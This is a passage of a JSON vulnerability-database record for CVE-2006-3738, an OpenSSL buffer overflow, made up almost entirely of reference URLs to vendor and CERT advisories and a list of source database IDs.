            "problemtype": "CWE-119",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.4,
            "url": "http://www.securityfocus.com/bid/22083"
          },
          {
            "trust": 2.7,
            "url": "http://www.openssl.org/news/secadv_20060928.txt"
          },
          {
            "trust": 2.1,
            "url": "http://www.kb.cert.org/vuls/id/547300"
          },
          {
            "trust": 1.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102668-1"
          },
          {
            "trust": 1.8,
            "url": "http://www.securityfocus.com/bid/20249"
          },
          {
            "trust": 1.8,
            "url": "http://www.us-cert.gov/cas/techalerts/ta06-333a.html"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/23280/"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/23309/"
          },
          {
            "trust": 1.4,
            "url": "http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html"
          },
          {
            "trust": 1.3,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2006-260.htm"
          },
          {
            "trust": 1.3,
            "url": "http://www.cisco.com/warp/public/707/cisco-sr-20061108-openssl.shtml"
          },
          {
            "trust": 1.3,
            "url": "http://kolab.org/security/kolab-vendor-notice-11.txt"
          },
          {
            "trust": 1.3,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-3738"
          },
          {
            "trust": 1.1,
            "url": "http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_aq_inv.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.red-database-security.com/advisory/oracle_cpu_jan_2007.html"
          },
          {
            "trust": 1.1,
            "url": "http://issues.rpath.com/browse/rpl-613"
          },
          {
            "trust": 1.1,
            "url": "http://security.gentoo.org/glsa/glsa-200610-11.xml"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22385"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22172"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/26329"
          },
          {
            "trust": 1.0,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a4256"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22330"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22220"
          },
          {
            "trust": 1.0,
            "url": "http://marc.info/?l=bugtraq\u0026m=130497311408250\u0026w=2"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22116"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22799"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22094"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22654"
          },
          {
            "trust": 1.0,
            "url": "http://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3860"
          },
          {
            "trust": 1.0,
            "url": "http://www.debian.org/security/2006/dsa-1185"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22193"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22216"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4401"
          },
          {
            "trust": 1.0,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujan2007-101493.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22633"
          },
          {
            "trust": 1.0,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:172"
          },
          {
            "trust": 1.0,
            "url": "http://securitytracker.com/id?1017522"
          },
          {
            "trust": 1.0,
            "url": "http://www.redhat.com/support/errata/rhsa-2008-0629.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/447318/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2006\u0026m=slackware-security.676946"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22626"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22212"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23309"
          },
          {
            "trust": 1.0,
            "url": "http://lists.apple.com/archives/security-announce/2006/nov/msg00001.html"
          },
          {
            "trust": 1.0,
            "url": "http://openvpn.net/changelog.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/2783"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22460"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/470460/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22487"
          },
          {
            "trust": 1.0,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29237"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22240"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22772"
          },
          {
            "trust": 1.0,
            "url": "http://itrc.hp.com/service/cki/docdisplay.do?docid=c00805100"
          },
          {
            "trust": 1.0,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a9370"
          },
          {
            "trust": 1.0,
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-september/049715.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:178"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/24950"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4314"
          },
          {
            "trust": 1.0,
            "url": "http://www.debian.org/security/2006/dsa-1195"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/447393/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23915"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/25889"
          },
          {
            "trust": 1.0,
            "url": "ftp://patches.sgi.com/support/free/security/advisories/20061001-01-p.asc"
          },
          {
            "trust": 1.0,
            "url": "http://www.xerox.com/downloads/usa/en/c/cert_essnetwork_xrx07001_v1.pdf"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22298"
          },
          {
            "trust": 1.0,
            "url": "http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23155"
          },
          {
            "trust": 1.0,
            "url": "http://www.redhat.com/support/errata/rhsa-2006-0695.html"
          },
          {
            "trust": 1.0,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2006-220.htm"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4036"
          },
          {
            "trust": 1.0,
            "url": "http://www.serv-u.com/releasenotes/"
          },
          {
            "trust": 1.0,
            "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2008-007.txt.asc"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22165"
          },
          {
            "trust": 1.0,
            "url": "http://securitytracker.com/id?1016943"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/456546/100/200/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22259"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23038"
          },
          {
            "trust": 1.0,
            "url": "http://www.novell.com/linux/security/advisories/2006_24_sr.html"
          },
          {
            "trust": 1.0,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102711-1"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/2315"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3820"
          },
          {
            "trust": 1.0,
            "url": "http://sourceforge.net/project/shownotes.php?release_id=461863\u0026group_id=69227"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/1401"
          },
          {
            "trust": 1.0,
            "url": "http://docs.info.apple.com/article.html?artnum=304829"
          },
          {
            "trust": 1.0,
            "url": "http://www.trustix.org/errata/2006/0054"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23280"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22130"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22166"
          },
          {
            "trust": 1.0,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-201531-1"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/0343"
          },
          {
            "trust": 1.0,
            "url": "http://www.ubuntu.com/usn/usn-353-1"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23794"
          },
          {
            "trust": 1.0,
            "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c01118771"
          },
          {
            "trust": 1.0,
            "url": "http://security.freebsd.org/advisories/freebsd-sa-06:23.openssl.asc"
          },
          {
            "trust": 1.0,
            "url": "http://www.openpkg.org/security/advisories/openpkg-sa-2006.021-openssl.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4443"
          },
          {
            "trust": 1.0,
            "url": "http://www.osvdb.org/29262"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/31492"
          },
          {
            "trust": 1.0,
            "url": "http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3902"
          },
          {
            "trust": 1.0,
            "url": "http://www.cisco.com/en/us/products/hw/contnetw/ps4162/tsd_products_security_response09186a008077af1b.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22260"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22284"
          },
          {
            "trust": 1.0,
            "url": "http://www.novell.com/linux/security/advisories/2006_58_openssl.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22500"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3869"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22186"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/30124"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/30161"
          },
          {
            "trust": 1.0,
            "url": "http://www.gentoo.org/security/en/glsa/glsa-200612-11.xml"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22544"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23680"
          },
          {
            "trust": 1.0,
            "url": "http://www.gentoo.org/security/en/glsa/glsa-200805-07.xml"
          },
          {
            "trust": 1.0,
            "url": "http://itrc.hp.com/service/cki/docdisplay.do?docid=c00849540"
          },
          {
            "trust": 1.0,
            "url": "https://www2.itrc.hp.com/service/cki/docdisplay.do?docid=c00967144"
          },
          {
            "trust": 1.0,
            "url": "http://www130.nortelnetworks.com/go/main.jsp?cscat=bltndetail\u0026documentoid=498093\u0026renditionid=\u0026poid=8881"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3936"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4750"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22791"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22758"
          },
          {
            "trust": 1.0,
            "url": "http://www.vmware.com/support/vi3/doc/esx-3069097-patch.html"
          },
          {
            "trust": 1.0,
            "url": "http://openbsd.org/errata.html#openssl2"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4264"
          },
          {
            "trust": 1.0,
            "url": "http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/24930"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23340"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22207"
          },
          {
            "trust": 1.0,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:177"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4417"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu%23386964/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/bid/20246"
          },
          {
            "trust": 0.8,
            "url": "http://www.imc.org/ietf-openpgp/mail-archive/msg14307.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.matasano.com/log/469/many-rsa-signatures-may-be-forgeable-in-openssl-and-elsewhere/"
          },
          {
            "trust": 0.8,
            "url": "http://www.openssl.org/news/secadv_20060905.txt "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/21709/"
          },
          {
            "trust": 0.8,
            "url": "http://www.rsasecurity.com/rsalabs/node.asp?id=2125"
          },
          {
            "trust": 0.8,
            "url": "http://www.ietf.org/rfc/rfc3447.txt"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu%23547300/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-september/049715.html "
          },
          {
            "trust": 0.8,
            "url": "https://issues.rpath.com/browse/rpl-613 "
          },
          {
            "trust": 0.8,
            "url": "http://www.openssl.org/news/secadv_20060928.txt "
          },
          {
            "trust": 0.8,
            "url": "http://kolab.org/security/kolab-vendor-notice-11.txt "
          },
          {
            "trust": 0.8,
            "url": "http://openvpn.net/changelog.html "
          },
          {
            "trust": 0.8,
            "url": "http://www.serv-u.com/releasenotes/ "
          },
          {
            "trust": 0.8,
            "url": "http://openbsd.org/errata.html#openssl2 "
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/bid/20249 "
          },
          {
            "trust": 0.8,
            "url": "http://securitytracker.com/id?1016943 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22130 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22094 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22165 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22186 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22193 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22207 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22259 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22260 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22166 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22172 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22212 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22240 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22216 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22116 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22220 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22284 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22330 "
          },
          {
            "trust": 0.8,
            "url": "http://xforce.iss.net/xforce/xfdb/29237 "
          },
          {
            "trust": 0.8,
            "url": "http://www.frsirt.com/english/advisories/2006/3820"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnta06-333a/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu%23547300"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnta07-017a/"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/tr/trta06-333a"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/tr/trta07-017a"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2006-3738"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22130/"
          },
          {
            "trust": 0.8,
            "url": "http://www.us-cert.gov/cas/alerts/sa06-333a.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.us-cert.gov/cas/techalerts/ta07-017a.html"
          },
          {
            "trust": 0.6,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0264.html"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2022.0696"
          },
          {
            "trust": 0.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-3738"
          },
          {
            "trust": 0.3,
            "url": "http://www.cisco.com/warp/public/707/cisco-air-20061108-openssl.shtml"
          },
          {
            "trust": 0.3,
            "url": "http://www.itefix.no/phpws/index.php?module=announce\u0026ann_user_op=view\u0026ann_id=80"
          },
          {
            "trust": 0.3,
            "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c00967144"
          },
          {
            "trust": 0.3,
            "url": "http://www1.itrc.hp.com/service/cki/docdisplay.do?admit=-682735245+1165342903618+28353475\u0026docid=c00805100"
          },
          {
            "trust": 0.3,
            "url": "http://www14.software.ibm.com/webapp/set2/sas/f/hmc/home.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.ipcop.org/modules.php?op=modload\u0026name=news\u0026file=article\u0026sid=31\u0026mode=thread\u0026order=0\u0026thold=0"
          },
          {
            "trust": 0.3,
            "url": "http://www.ingate.com/relnote-452.php"
          },
          {
            "trust": 0.3,
            "url": "http://www.cyberguard.info/snapgear/releases.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.stonesoft.com/en/support/security_advisories/2909_2006.html"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102711-1\u0026searchclause="
          },
          {
            "trust": 0.3,
            "url": "/archive/1/481217"
          },
          {
            "trust": 0.3,
            "url": "https://www.itrc.hp.com/service/cki/docdisplay.do?docid=emr_na-c02475053"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0525.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0629.html"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102668-1\u0026searchclause="
          },
          {
            "trust": 0.3,
            "url": "http://www116.nortelnetworks.com/pub/repository/clarify/document/2006/44/021420-01.pdf"
          },
          {
            "trust": 0.3,
            "url": "http://a1851.g.akamaitech.net/f/1851/2996/24h/cacheb.xerox.com/downloads/usa/en/c/cert_essnetwork_xrx07001_v1.pdf"
          },
          {
            "trust": 0.3,
            "url": "http://www.red-database-security.com/advisory/oracle_buffer_overflow_ons.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.red-database-security.com/advisory/oracle_xmldb_css2.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.integrigy.com/security-resources/analysis/oracle-cpu-january-2007/view"
          },
          {
            "trust": 0.3,
            "url": "http://www.integrigy.com/security-resources/analysis/cpu-january-2007-tech-matrix/view"
          },
          {
            "trust": 0.3,
            "url": "http://www.appsecinc.com/resources/alerts/oracle/2007-01.shtml"
          },
          {
            "trust": 0.3,
            "url": "http://www.appsecinc.com/resources/alerts/oracle/2007-03.shtml"
          },
          {
            "trust": 0.3,
            "url": "http://www.appsecinc.com/resources/alerts/oracle/2007-06.shtml"
          },
          {
            "trust": 0.3,
            "url": "http://www.appsecinc.com/resources/alerts/oracle/2007-02.shtml"
          },
          {
            "trust": 0.3,
            "url": "http://www.oracle.com/index.html"
          },
          {
            "trust": 0.3,
            "url": "https://www.it-isac.org/postings/cyber/alertdetail.php?id=4092"
          },
          {
            "trust": 0.3,
            "url": "http://www.kb.cert.org/vuls/id/221788"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/457193"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/464470"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458657"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458036"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458006"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458037"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458005"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458041"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458038"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/458475"
          },
          {
            "trust": 0.3,
            "url": "http://docs.info.apple.com/article.html?artnum=307177"
          },
          {
            "trust": 0.3,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-4343"
          },
          {
            "trust": 0.3,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2940"
          },
          {
            "trust": 0.3,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2937"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-4339"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-4343"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-2940"
          },
          {
            "trust": 0.3,
            "url": "http://www.itrc.hp.com/service/cki/secbullarchive.do"
          },
          {
            "trust": 0.3,
            "url": "http://h30046.www3.hp.com/driveralertprofile.php?regioncode=na\u0026langcode=useng\u0026jumpid=in_sc-gen__driveritrc\u0026topiccode=itrc"
          },
          {
            "trust": 0.3,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-2937"
          },
          {
            "trust": 0.3,
            "url": "http://h30046.www3.hp.com/subsignin.php"
          },
          {
            "trust": 0.2,
            "url": "http://bugs.gentoo.org."
          },
          {
            "trust": 0.2,
            "url": "http://creativecommons.org/licenses/by-sa/2.5"
          },
          {
            "trust": 0.2,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-5135"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5135"
          },
          {
            "trust": 0.2,
            "url": "http://security.gentoo.org/"
          },
          {
            "trust": 0.2,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-3747"
          },
          {
            "trust": 0.1,
            "url": "http://enigmail.mozdev.org"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2007-3108"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3108"
          },
          {
            "trust": 0.1,
            "url": "http://security.gentoo.org/glsa/glsa-200710-06.xml"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/"
          },
          {
            "trust": 0.1,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2940"
          },
          {
            "trust": 0.1,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-3738"
          },
          {
            "trust": 0.1,
            "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2937"
          },
          {
            "trust": 0.1,
            "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-4343"
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/patches/sa-07:08/openssl.patch.asc"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-3738"
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/\u003e."
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/advisories/freebsd-sa-07:08.openssl.asc"
          },
          {
            "trust": 0.1,
            "url": "http://security.freebsd.org/patches/sa-07:08/openssl.patch"
          },
          {
            "trust": 0.1,
            "url": "http://marc.info/?l=bugtraq\u0026m=119091888624735"
          },
          {
            "trust": 0.1,
            "url": "http://pgp.openpkg.org"
          },
          {
            "trust": 0.1,
            "url": "http://www.openssl.org/"
          },
          {
            "trust": 0.1,
            "url": "http://www.openpkg.org"
          },
          {
            "trust": 0.1,
            "url": "http://www.openpkg.org/security/"
          },
          {
            "trust": 0.1,
            "url": "http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayproductinfo.pl?productnumber=hpuxwssuite"
          },
          {
            "trust": 0.1,
            "url": "http://software.hp.com/portal/swdepot/displayproductinfo.do?productnumber=b6834aa"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2005-2969"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2002-0840"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3293"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0492"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3292"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-3918"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-0005"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0010"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2003-0542"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3291"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2002-0839"
          },
          {
            "trust": 0.1,
            "url": "http://h71000.www7.hp.com/openvms/products/ips/apache/csws_php.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2005-3357"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2005-3352"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2005-2491"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-5000"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3095"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3555"
          },
          {
            "trust": 0.1,
            "url": "http://h71000.www7.hp.com/openvms/products/ips/apache/csws.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2007-6388"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-1891"
          },
          {
            "trust": 0.1,
            "url": "http://h18023.www1.hp.com/support/files/server/us/download/26977.html"
          },
          {
            "trust": 0.1,
            "url": "http://h18023.www1.hp.com/support/files/server/us/download/26866.html"
          },
          {
            "trust": 0.1,
            "url": "http://h18023.www1.hp.com/support/files/server/us/download/26864.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.mandriva.com/security/"
          },
          {
            "trust": 0.1,
            "url": "https://www.niscc.gov.uk)."
          },
          {
            "trust": 0.1,
            "url": "http://www.mandriva.com/security/advisories"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#221788"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "BID",
            "id": "22083"
          },
          {
            "db": "PACKETSTORM",
            "id": "59899"
          },
          {
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "db": "PACKETSTORM",
            "id": "59797"
          },
          {
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "db": "PACKETSTORM",
            "id": "101257"
          },
          {
            "db": "PACKETSTORM",
            "id": "58346"
          },
          {
            "db": "PACKETSTORM",
            "id": "51324"
          },
          {
            "db": "PACKETSTORM",
            "id": "50548"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#221788"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "BID",
            "id": "22083"
          },
          {
            "db": "PACKETSTORM",
            "id": "59899"
          },
          {
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "db": "PACKETSTORM",
            "id": "59797"
          },
          {
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "db": "PACKETSTORM",
            "id": "53990"
          },
          {
            "db": "PACKETSTORM",
            "id": "101257"
          },
          {
            "db": "PACKETSTORM",
            "id": "58346"
          },
          {
            "db": "PACKETSTORM",
            "id": "51324"
          },
          {
            "db": "PACKETSTORM",
            "id": "50548"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          },
          {
